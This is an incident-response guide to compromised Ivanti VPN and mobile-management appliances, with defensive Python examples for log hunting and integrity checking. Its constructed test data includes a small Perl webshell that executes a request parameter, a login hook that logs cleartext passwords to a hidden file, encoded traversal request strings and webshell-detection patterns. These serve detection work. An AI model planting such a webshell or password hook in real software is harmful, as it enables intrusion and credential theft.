To investigate an intrusion, analysts must identify which specific Ivanti component is targeted and understand its role within the network architecture.
Ivanti Connect Secure (ICS)
Formerly Pulse Connect Secure. This is the flagship product and the appliance most often encountered in DFIR engagements. ICS is an SSL VPN gateway that provides remote access to corporate resources. It runs a locked-down, proprietary appliance OS that exposes a restricted admin console rather than a shell, and because it terminates VPN sessions for legitimate users, compromising it gives an attacker a foothold with direct, authenticated reach into the internal network.
Ivanti EPMM
Formerly MobileIron Core. EPMM (Endpoint Manager Mobile) is a Mobile Device Management (MDM/UEM) solution that manages and secures fleets of corporate smartphones and tablets. Compromising it exposes the device inventory, user identities and the configurations pushed to devices, and the server itself can serve as a pivot point into the internal network.
Ivanti Sentry
Formerly MobileIron Sentry. An in-line gateway that secures, encrypts, and manages traffic between mobile devices managed by EPMM and enterprise backend services (such as Microsoft Exchange ActiveSync).
Because ICS, EPMM and Sentry must be reachable from the public internet to do their jobs, they are an ideal edge attack surface. They also operate as “black boxes”: traditional EDR agents cannot be deployed on them and administrators get no shell, which leaves defenders a blind spot that attackers have learned to exploit.
In recent years (notably spanning 2023 to 2026), a barrage of critical vulnerabilities, chained to achieve unauthenticated Remote Code Execution (RCE), has been exploited at scale by state-sponsored actors. The best-known chain combined an authentication bypass (CVE-2023-46805) with a command injection (CVE-2024-21887); a server-side request forgery in the SAML component (CVE-2024-21893) followed once the first pair was mitigated.
Once a zero-day is leveraged to bypass authentication, adversaries typically deploy a consistent set of Tactics, Techniques, and Procedures (TTPs):
Webshells & Backdoors: Dropping persistent webshells (written in .pl, .cgi, or .py) directly onto the appliance’s file system.
Credential Harvesting: Modifying the appliance’s legitimate source code (JavaScript or Perl CGI files) to hook the login functions, allowing attackers to steal cleartext passwords and active session cookies of legitimate users as they authenticate.
Lateral Movement: Utilizing the compromised gateway as an internal proxy to tunnel traffic and launch attacks deep into the corporate network.
Compromise of an Ivanti appliance is a maximum-severity incident. Because it is a proprietary system, investigation requires highly specific triage methodologies.
The Integrity Checker Tool (ICT):
This is the first action in any investigation. Provided by Ivanti, the ICT compares the appliance’s system files against a known-good cryptographic baseline and reports files that are new, modified or missing. A failing or flagged ICT run must be treated as a compromise until proven otherwise, and its output should be preserved as evidence. Treat a clean result as necessary but not sufficient: the ICT only examines the file system, so it cannot see memory-resident or already-cleaned-up activity, and attackers have tampered with the appliance’s built-in copy in the past, so run the external ICT package from Ivanti rather than trusting the appliance’s own.
Log Triage (System & Web):
Extract complete log snapshots via the administrative interface.
User Access Logs: Hunt for impossible-travel anomalies, logins at unusual hours, and bursts of failed authentications followed by a success from the same source.
Admin Event Logs: Look for unexpected configuration changes, new account creation, or access to sensitive admin panels.
Unauthenticated Web Logs: Hunt for requests containing directory traversal sequences (../, including URL-encoded and double-encoded forms) or unusual URI paths associated with exploit attempts.
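The two hunts described above (traversal sequences in unauthenticated web requests, and a burst of failures followed by a success in the user access log) as an added example. This is not Ivanti tooling and the log lines are constructed in a simplified format; the real Ivanti exports look different, so the parsing regex and field split are the parts to adapt to the snapshot you pull.

```python
"""Added example: hunting two log patterns in constructed, simplified log
lines. Not Ivanti tooling; adapt WEB_RE and the user-access field layout to
the real export before use."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed web log in a simplified combined-log style (not the ICS format).
WEB_LOG = """\
203.0.113.7 - - [10/Jan/2024:03:12:01 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 512
198.51.100.9 - - [10/Jan/2024:03:12:44 +0000] "GET /api/v1/status/../../../system/config HTTP/1.1" 403 0
198.51.100.9 - - [10/Jan/2024:03:12:50 +0000] "GET /api/v1/%2e%2e/%2e%2e/system/config HTTP/1.1" 403 0
198.51.100.9 - - [10/Jan/2024:03:12:58 +0000] "GET /api/%252e%252e/config?x=1 HTTP/1.1" 404 0
203.0.113.7 - - [10/Jan/2024:03:13:10 +0000] "POST /dana-na/auth/url_default/login.cgi HTTP/1.1" 302 0
"""

WEB_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded traversal (%252e) is unmasked."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(uri: str) -> bool:
    """True if any path segment is '..' once encoding and backslashes are normalised."""
    path = decode_fully(uri.split("?", 1)[0]).replace("\\", "/")
    return ".." in path.split("/")


def hunt_traversal(log_text: str) -> list:
    """Return (ip, status, raw uri) for every request carrying a traversal sequence."""
    hits = []
    for line in log_text.splitlines():
        m = WEB_RE.match(line)
        if m and is_traversal(m["uri"]):
            hits.append((m["ip"], m["status"], m["uri"]))
    return hits


# Constructed user access events: "<date> <time> <user> <source ip> <result>".
USER_ACCESS = """\
2024-01-10 03:20:01 jdoe 198.51.100.9 FAIL
2024-01-10 03:20:09 jdoe 198.51.100.9 FAIL
2024-01-10 03:20:17 jdoe 198.51.100.9 FAIL
2024-01-10 03:20:26 jdoe 198.51.100.9 FAIL
2024-01-10 03:20:35 jdoe 198.51.100.9 FAIL
2024-01-10 03:21:30 jdoe 198.51.100.9 SUCCESS
2024-01-10 08:00:00 asmith 203.0.113.7 SUCCESS
2024-01-10 08:05:12 bkim 203.0.113.20 FAIL
2024-01-10 08:05:40 bkim 203.0.113.20 SUCCESS
"""


def brute_force_then_success(log_text: str, threshold: int = 5,
                             window: timedelta = timedelta(minutes=10)) -> list:
    """Flag (user, ip) pairs whose success follows >= threshold failures within window."""
    recent_fails = defaultdict(list)
    hits = []
    for line in log_text.splitlines():
        date, time, user, ip, result = line.split()
        t = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
        key = (user, ip)
        if result == "FAIL":
            recent_fails[key].append(t)
            continue
        fails = [f for f in recent_fails[key] if t - f <= window]
        if len(fails) >= threshold:
            hits.append({"user": user, "ip": ip, "failures": len(fails),
                         "success_at": t.isoformat()})
        recent_fails[key].clear()  # a success resets the window for that pair
    return hits


if __name__ == "__main__":
    for hit in hunt_traversal(WEB_LOG):
        print("traversal:", hit)
    for hit in brute_force_then_success(USER_ACCESS):
        print("brute force then success:", hit)
```

The traversal check decodes the URI repeatedly before splitting it into segments, because a filter that only looks for a literal ../ misses %2e%2e/ and the double-encoded %252e%252e/ that request smuggling through a front-end decoder relies on. The brute-force rule keys on user and source address together; lowering the threshold or widening the window trades false positives for sensitivity and should be tuned against a known-clean day of logs.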
Advanced Appliance Forensics:
Acquire a full system snapshot (which captures the file system and configuration) before any reboot, upgrade or factory reset, since those remediation steps destroy the evidence.
Search the web-served and runtime directories (e.g., /data/runtime/tmp/) for dropped webshells.
Audit cron jobs for persistence mechanisms.
Review legitimate files modified by attackers (which should correlate with ICT findings).
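An added example tying the ICT step and the snapshot review above together: an integrity diff of an acquired snapshot against a hash baseline, followed by an indicator scan of every file the diff flags as new or modified. This is not Ivanti's Integrity Checker Tool; the baseline, the directory layout, the "legitimate" CGI contents and the attacker changes are all constructed for the demonstration, and the indicator regexes are a starting point rather than a complete webshell signature set.

```python
"""Added example: ICT-style integrity diff over a snapshot tree plus an
indicator scan of flagged Perl/CGI files. Not Ivanti's ICT; every path and
file body here is constructed."""
import hashlib
import os
import re
import tempfile
from pathlib import Path

# Constructed "known-good" contents standing in for the vendor baseline.
KNOWN_GOOD = {
    "htdocs/dana-na/auth/login.cgi": (
        "#!/usr/bin/perl\nuse strict;\n"
        "my $user = param('username');\n"
        "authenticate($user, param('password'));\n"
    ),
    "htdocs/dana-na/auth/welcome.cgi": "#!/usr/bin/perl\nprint \"welcome\\n\";\n",
}

# Constructed attacker changes: a credential hook appended to a legitimate
# login handler, and a new webshell dropped in a runtime directory.
CREDENTIAL_HOOK = (
    "open(my $fh, '>>', '/data/runtime/tmp/.x') or die;\n"
    "print $fh param('username') . ':' . param('password') . \"\\n\";\n"
)
WEBSHELL = "#!/usr/bin/perl\nuse CGI;\nmy $q = CGI->new;\nprint `$q->param('cmd')`;\n"

# Indicator patterns (assumed starting set, not a vendor signature list).
INDICATORS = {
    "shell_exec": re.compile(r"\bsystem\s*\(|`[^`]*\$[^`]*`|\bexec\s*\("),
    "eval_of_input": re.compile(r"\beval\s*\(?\s*\$"),
    "credential_write": re.compile(
        r"open\s*\([^)]*'>>'[^)]*\)[\s\S]{0,200}param\('password'\)"),
}


def sha256_text(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def baseline_manifest() -> dict:
    """Path -> sha256 of the known-good contents (what a real baseline provides)."""
    return {path: sha256_text(body) for path, body in KNOWN_GOOD.items()}


def build_demo_snapshot() -> str:
    """Write the constructed snapshot tree to a temp dir and return its root."""
    root = tempfile.mkdtemp(prefix="ivanti-snap-")
    files = dict(KNOWN_GOOD)
    files["htdocs/dana-na/auth/login.cgi"] += CREDENTIAL_HOOK  # modified legit file
    files["data/runtime/tmp/shell.pl"] = WEBSHELL               # new file
    for rel, body in files.items():
        target = Path(root, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return root


def diff_snapshot(root: str, manifest: dict) -> dict:
    """Classify files as new or modified against the manifest; list baseline files missing."""
    seen = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = Path(dirpath, name)
            rel = full.relative_to(root).as_posix()
            seen[rel] = hashlib.sha256(full.read_bytes()).hexdigest()
    return {
        "new": sorted(p for p in seen if p not in manifest),
        "modified": sorted(p for p in seen if p in manifest and seen[p] != manifest[p]),
        "missing": sorted(p for p in manifest if p not in seen),
    }


def webshell_indicators(text: str) -> list:
    """Names of indicator patterns that match the given file contents."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def triage(root: str, manifest: dict) -> dict:
    """Integrity diff plus indicator hits for each file the diff flagged."""
    result = diff_snapshot(root, manifest)
    result["indicators"] = {
        rel: webshell_indicators(Path(root, rel).read_text())
        for rel in result["new"] + result["modified"]
    }
    return result


if __name__ == "__main__":
    import json
    print(json.dumps(triage(build_demo_snapshot(), baseline_manifest()), indent=2))
```

The diff and the indicator scan are deliberately separate stages: a modified file with no indicator hit is still a finding (it correlates with the ICT result and needs a manual look), while an indicator hit in an unmodified baseline file would point at a stale or wrong baseline rather than at the attacker. Point the scan at the whole snapshot, not just the web root, since droppers in runtime and temp directories are exactly what a web-root-only review misses.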
Immediate Containment:
If a compromise is strongly suspected, isolate the appliance from the internal network immediately to halt lateral movement, but keep it powered on and unreset until the snapshot and logs have been acquired. Cross-reference the running OS version against the affected versions in Ivanti’s advisories and check the corresponding CVEs in the CISA Known Exploited Vulnerabilities (KEV) catalog to establish how long the box sat exposed to known in-the-wild exploitation. Given the credential-harvesting TTP above, assume every password and session that transited the gateway during that window is compromised and plan the rotation accordingly.
To effectively investigate, contain, and remediate Ivanti compromises, the Hermes Codex provides specialized deep-dive guides. Proceed to the following operational modules based on your investigation phase:
2. The Traces: Ivanti Log Analysis & Cryptic Parsing — A guide to deciphering proprietary Ivanti logs (log.cgi, user_access.log) and hunting for HTTP attack signatures.
3. The Evidence: Artifact Hunting & Webshell Detection — Uncover where attackers hide .jsp and .pl webshells, and how to analyze Integrity Checker Tool (ICT) results.